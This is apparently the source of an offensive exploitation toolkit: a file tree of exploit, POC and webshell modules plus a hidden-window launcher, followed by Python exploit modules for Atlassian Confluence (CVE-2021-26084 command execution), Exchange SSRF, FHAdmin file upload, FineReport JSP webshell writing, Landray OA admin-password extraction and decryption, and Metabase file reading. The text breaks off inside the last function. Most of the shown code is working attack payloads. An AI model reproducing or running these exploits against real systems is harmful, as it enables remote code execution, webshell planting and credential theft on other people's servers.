├── ClassCongregation.py
├── CodeTest.bat
├── CodeTest.pyw
├── EXP
├── ALL.py
├── ApacheShiro.py
├── ApacheSolr.py
├── ApacheStruts2.py
├── ApacheTomcat.py
├── AtlassianConfluence.py
├── Exchange.py
├── FHAdmin.py
├── Fastjson.py
├── FineReport.py
├── LandrayOA.py
├── MetaBase.py
├── OracleWeblogic.py
├── PHPStudy.py
├── ThinkPHP.py
├── Tongda.py
├── WindowsSMBv3.py
└── __init__.py
├── POC
├── ByPass403.py
├── ByWAF_Mysql.py
├── Editor_vul.py
├── FHAdmin.py
├── FOFA.py
├── Fastjson_RCE.py
├── Fckeditor.py
├── GetCMS.py
├── GoogleHacking.py
├── IIS_MS15-034_Range_bytes.py
├── IIS_shortname_Scan.py
├── JSFinder.py
├── JSencode.py
├── LinkFinder.py
├── Log4j-scan.py
├── Nginx_iis_scan.py
├── Redis_unauthorized_access.py
├── Scan_zip.py
├── Shiro_poc_DNS.py
├── SpringBootVulExploit.py
├── Struts2Scan.py
├── Swagger-exp.py
├── TPscan.py
├── ThinkAdmin.py
├── ThinkphpVersion.py
├── Thinkphp_5_0_23_rce.py
├── Thinkphp_5_rce_1.py
├── Tomcat_Ajp-lfi.py
├── Tomcat_http_put.py
├── Tongda_cookie_11_4.py
├── Tongda_rce_11_4.py
├── Tongda_v11_4_rce_getshell.py
├── URL_getTitle.py
├── Weaver-Ecology-OA_RCE-EXP.py
├── WeblogicScan.py
├── Weblogic_GIOP.py
├── Weblogic_T3.py
├── Weblogic_weakPass.py
├── __init__.py
├── js_examples
│ ├── enpassword.js
│ ├── md5.js
│ └── top100password.txt
├── webshell_asp.py
├── webshell_aspx.py
├── webshell_aspx_D.py
├── webshell_jsp.py
├── webshell_php.py
├── webshell_php_D.py
├── xcdn.py
└── 模板.py
├── Proxy
├── WebRequest.py
├── __init__.py
├── handler
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── configHandler.cpython-37.pyc
│ │ ├── logHandler.cpython-37.pyc
│ │ └── proxyHandler.cpython-37.pyc
│ ├── configHandler.py
│ ├── logHandler.py
│ └── proxyHandler.py
├── helper
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-37.pyc
│ │ ├── check.cpython-37.pyc
│ │ ├── proxy.cpython-37.pyc
│ │ └── validator.cpython-37.pyc
│ ├── check.py
│ ├── fetch.py
│ ├── proxy.py
│ └── validator.py
├── ips.txt
├── log
│ ├── Apache Shiro
│ └── test.log
├── proxyFetcher.py
├── proxySetting.py
├── sqlmap_auto_proxy.bat
├── sqlmap_auto_proxy.py
└── util
│ ├── __init__.py
│ ├── lazyProperty.py
│ ├── singleton.py
│ └── six.py
├── README.md
├── Template
├── EXP.j2
├── POC.j2
└── __init__.py
├── data
├── api-docs.json
├── bool_blind.xml
├── error.xml
└── time_blind.xml
├── execScripts
├── Caidao_cmd.jsp
├── Caidao_shell.asp
├── Caidao_shell.aspx
└── Caidao_shell.php
├── img
├── 1.png
└── 2.png
├── lib
├── green.png
├── note.txt
└── red.png
├── log
└── info.txt
├── payload_html
├── Ueditor
│ ├── Ueditor.html
│ └── ueditor.png
├── chrome_payload.html
├── key.sh
├── kindeditor.html
├── npc
├── npc.exe
├── nps
└── wget.exe
├── python.ico
├── requirements.txt
├── settings.py
└── util
├── ExpRequest.py
└── globalvar.py
/CodeTest.bat:
--------------------------------------------------------------------------------
@echo off
REM Self-relaunch so the Python GUI runs without a console window:
REM the first invocation (no "h" argument) asks WScript.Shell, via mshta, to
REM start a second copy of this file with argument "h" and window style 0
REM (hidden), then exits; that second copy jumps straight to :begin.
REM NOTE(review): mshta launching a script is a pattern endpoint monitoring
REM commonly flags, so expect alerts when this runs on managed hosts.
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
REM -B: do not write .pyc files next to the sources
python3 -B CodeTest.pyw
--------------------------------------------------------------------------------
/EXP/ALL.py:
--------------------------------------------------------------------------------
1 | import sys,importlib,glob,os,datetime
2 | sys.path.append('../')
3 | #from concurrent.futures import ThreadPoolExecutor,wait,as_completed,ALL_COMPLETED
4 | from ClassCongregation import color
5 |
# Discover every EXP/*.py module (except this file and the package __init__)
# and import it. exp_scripts holds the bare module names, vuln_scripts the
# imported module objects, index-aligned. The glob is relative to the
# working directory, so the loader must run from the project root.
vuln_scripts = []
exp_scripts = []
for script_path in glob.glob('EXP/*.py'):
    module_name = os.path.basename(script_path).replace('.py', '')
    if module_name in ('ALL', '__init__'):
        continue
    # Import first: if it fails, neither list gains an entry for this name.
    loaded = importlib.import_module('.%s' % module_name, package='EXP')
    exp_scripts.append(module_name)
    vuln_scripts.append(loaded)
14 |
def check(**kwargs):
    """Run every loaded EXP module's ``check()`` against ``kwargs`` and join their reports.

    ``kwargs`` is passed through unchanged; ``kwargs['url']`` is required for
    the banner line. A module whose ``check()`` raises (or returns something
    that cannot be concatenated with a str) is reported on the console in
    yellow and skipped. Returns one report per module that succeeded, each
    terminated by a newline; an empty string when none did.
    """
    def stamp():
        # Same HH:MM:SS text as str(datetime)[11:19].
        return datetime.datetime.now().strftime('%H:%M:%S')

    color("[%s] [+] Scanning target domain %s" % (stamp(), kwargs['url']), 'green')
    # Walk the modules in discovery order; names and modules are index-aligned.
    reports = []
    for module, module_name in zip(vuln_scripts, exp_scripts):
        try:
            reports.append(module.check(**kwargs) + '\n')
        except Exception:
            color("[%s] [-] Running %s occured error!!!" % (stamp(), module_name), 'yellow')
    return ''.join(reports)
28 | #executor = ThreadPoolExecutor(max_workers = 3)
29 | #for data in executor.map(lambda kwargs: check(**kwargs),vuln_scripts):
30 | # pass
--------------------------------------------------------------------------------
/EXP/AtlassianConfluence.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | cve_2016_4437 反序列化命令执行(可回显)
6 | 目标系统: windows、linux
7 | """
class AtlassianConfluence():
    """Atlassian Confluence POC holder; one method per POC.

    The constructor copies the shared settings out of ``env``; the POC method
    reads ``self.url``, ``self.vuln`` and ``self.cmd`` and reports through the
    project's ``Output``/``ExpRequest`` helpers (not in view here, their
    contract is assumed from usage). ``self.status`` becomes ``'success'``
    only when the verification branch succeeds; ``check()`` returns it.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory:
        ``int(None)`` raises TypeError when they are missing. The other keys
        default to None. ``win_cmd``/``linux_cmd`` fall back to an echo marker
        only when ``cmd`` is absent from ``env`` (not when it is passed as None).
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def cve_2021_26084(self):
        """Verify (``self.vuln == 'False'``) or exploit (any other value) CVE-2021-26084 on ``self.url``.

        Side effects: one POST to ``self.url`` with TLS verification disabled,
        console output via ``Output``, and ``self.status = 'success'`` in the
        verification branch only. Exceptions are caught and reported, never raised.
        """
        appName = 'Atlassian Confluence'
        pocname = 'cve_2021_26084'
        path = '/'
        method = 'post'
        desc = '<6.13.23, 6.14.0~7.4.11, 7.5.0~7.11.5, 7.12.0~7.12.5'
        fofa = 'Atlassian Confluence'
        # NOTE(review): appName, path and fofa are assigned but never used;
        # the request goes to self.url itself, not self.url + path.
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)

        try:
            # Verification branch. self.vuln is compared as the *string* 'False',
            # so a boolean False selects the attack branch instead.
            if self.vuln == 'False':
                paramsPost = {"queryString":"aaa\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022]}+\\u0027bbb"}
                headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
                response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
                # Success is judged by the evaluated expression being reflected in the body.
                if "aaa{class java.lang.String=null}bbb" in response.text:
                    output.no_echo_success(method, desc)
                    self.status = 'success'
                else:
                    output.fail()

            # Attack branch: the payload is built around self.cmd (TypeError if it
            # is None, caught below). self.status is NOT updated here, so check()
            # returns whatever status was passed in.
            else:
                paramsPost = {"queryString":"kkk\\u0027+\x23{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var x=new java.lang.ProcessBuilder;x.command([\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027" + self.cmd + "\\u0027]);x.start()\\u0022)}+\\u0027"}
                headers = {"User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.0","Content-Type":"application/x-www-form-urlencoded"}
                response = exprequest.post(self.url, data=paramsPost, headers=headers, verify=False)
                if "kkk{Process" in response.text:
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
        except Exception as error:
            # Network errors and payload-construction errors alike end up here.
            output.error_output(str(error))
60 |
# Printed once at import time: a one-row summary table of the POCs in this module.
tb = pt.PrettyTable()
tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
for column in tb.field_names:
    tb.align[column] = 'l'
tb.add_row(["Atlassian Confluence", "cve_2021_26084", "body=\"Atlassian Confluence\" , [rce]"])
print(tb)
68 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``AtlassianConfluence``.

    ``kwargs`` is handed to the constructor unchanged and must contain
    ``pocname`` (KeyError otherwise). For a specific ``pocname`` the method of
    that name is called and the instance's ``status`` is returned as-is. For
    ``'ALL'`` every non-dunder name on the class is invoked in ``dir()`` order
    (all assumed to be POC methods) and a multi-line ``name -> status`` report
    framed by separator lines is returned; ``status`` is reset to ``'fail'``
    after each call so one result cannot leak into the next.
    """
    target = AtlassianConfluence(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        # The method name comes straight from the caller's input.
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(AtlassianConfluence):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
85 |
--------------------------------------------------------------------------------
/EXP/Exchange.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest, Output
2 | from ClassCongregation import Dnslog
3 | from operator import methodcaller
4 | """
5 | Exchange_SSRF [ssrf]
6 | """
class Exchange():
    """Exchange POC holder; one method per POC.

    Shared settings are copied from ``env`` in the constructor; the POC
    reports through the project's ``Output``/``ExpRequest`` helpers and the
    ``Dnslog`` out-of-band helper (none in view here). ``self.status`` becomes
    ``'success'`` only in the verification branch.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        ``win_cmd``/``linux_cmd`` fall back to an echo marker only when ``cmd``
        is absent from ``env``, not when it is passed as None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def Exchange_SSRF(self):
        """SSRF check against ``self.url + '/owa/auth/x.js'`` driven by the Cookie header.

        Verification (``self.vuln == 'False'``) is out-of-band: the backend
        hosts in the cookie are a Dnslog callback host and success means the
        callback was observed. Otherwise ``self.cmd`` is used as the backend
        host (not as a shell command), the raw response body is printed and
        ``self.status`` is left unchanged. Exceptions are reported, not raised.
        """
        appName = 'Exchange:Exchange_SSRF'
        pocname = 'Exchange_SSRF'
        path = '/owa/auth/x.js'
        method = 'get'
        desc = 'Apache Tomcat: Examples File'
        # NOTE(review): appName and desc are unused, and desc reads like a
        # copy-paste from a Tomcat POC.
        info = "[ssrf]"
        payload = ''
        cookie = 'X-AnonResource=true;X-AnonResource-Backend={}/ecp/default.flt?~3;X-BEResource={}/owa/auth/logon.aspx?~3;'
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)
        try:
            # Verification branch (string comparison, see class docstring).
            if self.vuln == 'False':
                dnslog = Dnslog()
                # dns_host() is called twice; presumably it returns the same host both times — confirm in ClassCongregation.
                exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(dnslog.dns_host(), dnslog.dns_host())}, timeout=self.timeout, verify=False)
                if dnslog.result():
                    output.echo_success(method, info)
                    self.status = 'success'
                else:
                    output.fail()
            # Attack branch: self.cmd is substituted for both backend hosts.
            else:
                request = exprequest.get(self.url + path, data=payload, headers={'Cookie':cookie.format(self.cmd, self.cmd)}, timeout=self.timeout, verify=False)
                print(request.text)
        except Exception as error:
            output.error_output(str(error))
53 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``Exchange``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``"ALL"`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be POC methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = Exchange(**kwargs)
    wanted = kwargs['pocname']
    if wanted != "ALL":
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(Exchange):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
70 |
--------------------------------------------------------------------------------
/EXP/FHAdmin.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | """
4 | import util.globalvar as GlobalVar
5 | from ClassCongregation import ysoserial_payload,Dnslog
6 | DL = Dnslog()
7 | DL.dns_host()
8 | DL.result()
9 | """
class FHAdmin():
    """FHAdmin POC holder; one method per POC.

    Shared settings come from ``env``; reporting goes through the project's
    ``Output``/``ExpRequest`` helpers (not in view). ``self.status`` becomes
    ``'success'`` only in the verification branch.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_20210824_upload(self):
        """Upload check against the uploadify endpoint (path prefixed with ``/;/``).

        Both branches send the *same* multipart body, so verification is not
        read-only on a vulnerable host. Verification (``self.vuln == 'False'``)
        succeeds when ``2021`` appears in the response and then prints the body;
        the other branch prints the resulting URL and the request body, leaving
        ``self.status`` unchanged. Exceptions are reported, not raised.
        """
        appName = 'FHAdmin'
        pocname = 'cve_20210824_upload'
        path = '/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/'
        method = 'post'
        desc = '[upload] 任意文件上传+shiro权限绕过'
        data = '--6aaf12c632ee6febfc354d1ba1bc914b\r\nContent-Disposition: form-data; name="imgFile"; filename="a5s_9y.jsp"\r\nContent-Type: application/octet-stream\r\n\r\n123\r\n--6aaf12c632ee6febfc354d1ba1bc914b--'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'multipart/form-data; boundary=6aaf12c632ee6febfc354d1ba1bc914b'}
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                # r"2021" is just the string "2021"; the raw prefix changes nothing.
                if r"2021" in r.text:
                    print(r.text)
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                # The response body is assumed to be the stored file name — confirm.
                print(self.url+'/;/plugins/uploadify/'+result.strip('\r\n')+'\n\n'+data)
        except Exception as error:
            output.error_output(str(error))
51 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``FHAdmin``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be POC methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = FHAdmin(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(FHAdmin):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
--------------------------------------------------------------------------------
/EXP/FineReport.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from ClassCongregation import random_name
3 | from operator import methodcaller
4 | import re
5 | """
6 | --FineReport--
7 | CVE_20210408 [upload],默认self.vuln = None
8 | """
class FineReport():
    """FineReport POC holder; one method per POC.

    Shared settings come from ``env``; reporting goes through the project's
    ``Output``/``ExpRequest`` helpers and file names through ``random_name``
    (none in view). ``self.status`` becomes ``'success'`` only in the
    verification branch.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        ``win_cmd``/``linux_cmd`` fall back to an echo marker only when ``cmd``
        is absent from ``env``, not when it is passed as None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def CVE_20210408_FineReport(self):
        """File-write check via the ReportServer ``design_save_svg`` endpoint.

        A random ``<6 chars>.jsp`` name is appended to the traversal path each
        call. Verification (``self.vuln == 'False'``) writes a marker string and
        then fetches ``/WebReport/<name>`` looking for it — so verification
        also leaves a file on a vulnerable host. The other branch writes the
        ``payload`` content and prints the URL; ``self.status`` is unchanged
        there. Exceptions are reported, not raised.
        """
        appName = 'FineReport'
        pocname = 'CVE_20210408'
        method = 'post'
        desc = 'FineReport:CVE_20210408'
        info = '[upload]'
        path = r'/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/'
        payload_verify = r'{"__CONTENT__":"VuLnEcHoPoCSuCCeSS","__CHARSET__":"UTF-8"}'
        payload = r'{"__CONTENT__":"<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>","__CHARSET__":"UTF-8"}'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
            'Connection': 'close',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Content-Type': 'text/xml;charset=UTF-8',
            'Accept-Au': '0c42b2f264071be0507acea1876c74'
        }
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)
        name = random_name(6)+'.jsp'
        path += name
        try:
            # Verification branch (string comparison on self.vuln).
            if self.vuln == 'False':
                # The POST response is discarded; only the follow-up GET is inspected.
                request = exprequest.post(self.url + path, data=payload_verify, headers=headers, timeout=self.timeout, verify=False)
                request = exprequest.get(self.url + '/WebReport/' + name, headers=headers, timeout=self.timeout, verify=False)
                if 'VuLnEcHoPoCSuCCeSS' in request.text:
                    output.echo_success(method, info)
                    self.status = 'success'
                else:
                    output.fail()
            # Attack branch: the response is not inspected.
            else:
                request = exprequest.post(self.url + path, data=payload, headers=headers, timeout=self.timeout, verify=False)
                print(self.url + path)
        except Exception as error:
            output.error_output(str(error))
65 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``FineReport``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be POC methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = FineReport(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(FineReport):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
82 |
83 |
--------------------------------------------------------------------------------
/EXP/LandrayOA.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from ClassCongregation import des_dec
3 | from operator import methodcaller
4 | import prettytable as pt
5 | import re
6 | """
7 | import util.globalvar as GlobalVar
8 | from ClassCongregation import ysoserial_payload,Dnslog
9 | DL = Dnslog()
10 | DL.dns_host()
11 | DL.result()
12 | """
class LandrayOA():
    """Landray OA POC holder; one method per POC.

    Shared settings come from ``env``; reporting goes through the project's
    ``Output``/``ExpRequest`` helpers and decryption through ``des_dec`` (none
    in view). ``self.status`` becomes ``'success'`` only in the verification
    branch.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_custom_filereading(self):
        """File-read check through ``/sys/ui/extend/varkind/custom.jsp``.

        Verification (``self.vuln == 'False'``) succeeds when ``password``
        appears in the response. The other branch extracts the ``password =``
        value with a regex, decrypts it with ``des_dec`` and prints the admin
        login URL and password; ``self.status`` is unchanged there. A response
        without a match makes ``re.search`` return None, so ``.group`` raises
        AttributeError, which the except reports. Exceptions are never raised.
        """
        appName = 'LandrayOA'
        pocname = 'cve_custom_filereading'
        path = '/sys/ui/extend/varkind/custom.jsp'
        method = 'post'
        desc = '[file reading] app="Landray-OA系统"'
        data = 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                r = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                if r"password" in r.text:
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.post(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                # The pattern expects a literal backslash-r after the value, i.e. an escaped body — confirm against a real response.
                pwd = re.search(r'password = (.*)\\r', result).group(1)
                # Only the first 8 characters of the key are used by default ('kmssAdmi').
                pwd = des_dec(pwd, 'kmssAdminKey'[0:8])
                print('[+]登录地址: %s ,登录密码: %s'%(self.url+'/admin.do',pwd))
        except Exception as error:
            output.error_output(str(error))
56 |
# Printed once at import time: a one-row summary table of the POCs in this module.
tb = pt.PrettyTable()
tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
for column in tb.field_names:
    tb.align[column] = 'l'
tb.add_row([
    "LandrayOA",
    "cve_custom_filereading",
    "[file reading] app=\"Landray-OA系统\""
])
print(tb)
68 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``LandrayOA``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be POC methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = LandrayOA(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(LandrayOA):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
--------------------------------------------------------------------------------
/EXP/MetaBase.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | import util.globalvar as GlobalVar
6 | from ClassCongregation import ysoserial_payload,Dnslog
7 | DL = Dnslog()
8 | DL.dns_host()
9 | DL.result()
10 | """
class MetaBase():
    """Metabase POC holder; one method per POC.

    Shared settings come from ``env``; reporting goes through the project's
    ``Output``/``ExpRequest`` helpers (not in view). ``self.status`` becomes
    ``'success'`` only in the verification branch.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

    def cve_MetaBase_20211123(self):
        """File-read check through ``/api/geojson`` with a ``file:`` URL.

        Verification (``self.vuln == 'False'``) succeeds when ``root:x`` appears
        in the response body; the other branch prints the body and leaves
        ``self.status`` unchanged. Exceptions are reported, not raised.
        """
        appName = 'MetaBase'
        pocname = 'cve_MetaBase_20211123'
        path = '/api/geojson?url=file:/etc/passswd'
        method = 'get'
        desc = '[file reading] metabase version >= 1.0.0, < 1.40.5'
        data = ''
        headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0', 'Connection': 'close', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'}
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)
        try:
            if self.vuln == 'False':
                # data='' on a GET is a no-op body; kept for symmetry with the POST POCs.
                r = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False)
                if r"root:x" in r.text:
                    self.status = 'success'
                    output.no_echo_success(method, desc)
                else:
                    output.fail()
            else:
                result = exprequest.get(self.url+path, data=data, headers=headers, retry_time=self.retry_time, retry_interval=self.retry_interval, timeout=self.timeout, verify=False).text
                print(result)
        except Exception as error:
            output.error_output(str(error))
51 |
# Printed once at import time: a one-row summary table of the POCs in this module.
tb = pt.PrettyTable()
tb.field_names = ['Target type', 'Vuln Name', 'Impact Version && Vulnerability description']
for column in tb.field_names:
    tb.align[column] = 'l'
tb.add_row([
    "MetaBase",
    "cve_MetaBase_20211123",
    "[file reading] metabase version >= 1.0.0, < 1.40.5"
])
print(tb)
63 |
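def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one POC, or every POC, of ``MetaBase``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be POC methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.

    Fix: the report is joined with newlines like every other EXP module. The
    previous ``''.join(...).strip('\\n')`` glued the separator and result lines
    into one string, which ALL.py then printed as a single unreadable line.
    """
    target = MetaBase(**kwargs)
    wanted = kwargs['pocname']
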